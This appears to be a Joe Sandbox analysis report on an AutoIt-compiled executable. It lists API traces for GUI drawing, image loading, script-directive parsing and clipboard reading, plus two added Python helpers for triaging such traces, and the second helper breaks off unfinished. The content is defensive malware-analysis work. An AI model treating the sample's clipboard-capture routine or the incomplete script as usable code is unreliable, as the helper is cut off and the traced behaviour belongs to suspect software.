                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                            • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                            • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                            • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                            • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
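The API trace above is the kind of record an analyst has to triage quickly: a CreateWindowExW with the literal title "AutoIt v3", followed by a CreateFileW / GetFileSize / GlobalAlloc / ReadFile / CreateStreamOnHGlobal / OleLoadPicture sequence, is the AutoIt v3 runtime's own picture-loading GUI code rather than payload behaviour, and the string literals resolved by the sandbox are the fastest way to spot that. The following Python script is an added example written for this page, not Joe Sandbox code or part of the report. It parses bullet lines in exactly the format shown above (including the indented "Part of subcall function" variant), separates resolved string arguments from hex constants and unknown ("?") values, and checks whether a given ordered API chain occurs in the function. The sample trace embedded in it is constructed by copying a dozen lines from the listing above; the chain definition and the field names are the script's own assumptions.

```python
import re
from collections import Counter

# One Joe Sandbox API-trace bullet, in the shape used on this report page:
#   • CreateFileW.KERNEL32(00000000,?,80000000,...), ref: 00459635
#   • _wcslen.LIBCMT ref: 00459800                 (no argument list)
#   •   Part of subcall function 00433D5C: CreatePen.GDI32(...), ref: 00433DFD
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumed chain: file read into a HGLOBAL, wrapped in an IStream, decoded
# by OLE.  This is what the function at 004593D7.. above does.
FILE_TO_PICTURE = ["CreateFileW", "GetFileSize", "GlobalAlloc", "ReadFile",
                   "CreateStreamOnHGlobal", "OleLoadPicture"]

# Constructed sample: lines copied from the 'APIs' block of this report.
SAMPLE_TRACE = """
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
• CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
• GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
• GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
• GlobalLock.KERNEL32(00000000), ref: 00459668
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
• _wcslen.LIBCMT ref: 00459800
  • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
"""


def parse_trace(text):
    """Turn the bullet lines of an 'APIs' block into a list of call records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as 'APIs' or 'Strings' are skipped
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module").upper(),
            "args": [] if args is None else [a.strip() for a in args.split(",")],
            "ref": int(m.group("ref"), 16),   # call-site address in the dump
            "subcall": m.group("sub"),        # caller of the subcall, or None
        })
    return calls


def string_arguments(calls):
    """Arguments that are neither 8-digit hex nor '?' are strings the sandbox
    resolved (window titles, class names, device names)."""
    return [(c["api"], a) for c in calls for a in c["args"]
            if a and a != "?" and not HEX8.match(a)]


def has_ordered_chain(calls, chain):
    """True if the APIs in `chain` appear in that order (not necessarily
    adjacent) when the trace is sorted by call-site address."""
    seq = iter(c["api"] for c in sorted(calls, key=lambda c: c["ref"]))
    return all(any(api == want for api in seq) for want in chain)


def triage(text):
    """Summarise one function's trace for an analyst."""
    calls = parse_trace(text)
    strings = string_arguments(calls)
    return {
        "calls": len(calls),
        "modules": Counter(c["module"] for c in calls),
        "strings": strings,
        "autoit_title": any(s == "AutoIt v3" for _, s in strings),
        "file_to_picture": has_ordered_chain(calls, FILE_TO_PICTURE),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_TRACE)
    print(f"{result['calls']} calls, modules: {dict(result['modules'])}")
    print("resolved strings:", sorted({s for _, s in result["strings"]}))
    print("AutoIt v3 window title:", result["autoit_title"])
    print("file -> IStream -> OleLoadPicture chain:", result["file_to_picture"])
```

Run against the whole "APIs" block of a function rather than the sample to get the full string set and module breakdown; when `autoit_title` is true and the function is dominated by USER32/GDI32 calls, it is interpreter GUI code and the payload logic should be looked for elsewhere in the listing.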
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                                            • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                                            • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                                            • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                              • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                              • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                              • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                              • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                              • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                              • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                              • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                              • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 69173610-0
                                                                                                                            • Opcode ID: 22debf79f4c44a035464754627ba5797adfaa2c58029bf194fe0b59aebe8cdef
                                                                                                                            • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                            • Opcode Fuzzy Hash: 22debf79f4c44a035464754627ba5797adfaa2c58029bf194fe0b59aebe8cdef
                                                                                                                            • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                            • API String ID: 1038674560-3360698832
                                                                                                                            • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                            • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                            • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                            • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1582027408-0
                                                                                                                            • Opcode ID: 7578141a4cd2ca5c617c85b142df9d46a946005b36bb3138e461c82ede761e40
                                                                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                            • Opcode Fuzzy Hash: 7578141a4cd2ca5c617c85b142df9d46a946005b36bb3138e461c82ede761e40
                                                                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                            APIs
                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
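The clipboard routine above is the concrete evidence behind the "Contains functionality for read data from the clipboard" signature: it asks for format 0000000D first, then format 00000001, and locks each handle with GlobalLock. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample; it parses API lines in the report's own "API.MODULE(args), ref: addr" layout (the sample input is copied from the listing above), decodes the clipboard format constants (CF_TEXT = 1 and CF_UNICODETEXT = 13 are Windows SDK values), and flags the OpenClipboard, GetClipboardData, GlobalLock sequence. The ordered-sequence heuristic is an assumption of this example, not a rule the report applies.

```python
import re

# Constructed sample: the API lines of the clipboard function as printed in
# the report above (addresses 0046C635 .. 0046C866), embedded for offline use.
SAMPLE_LISTING = """\
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
"""

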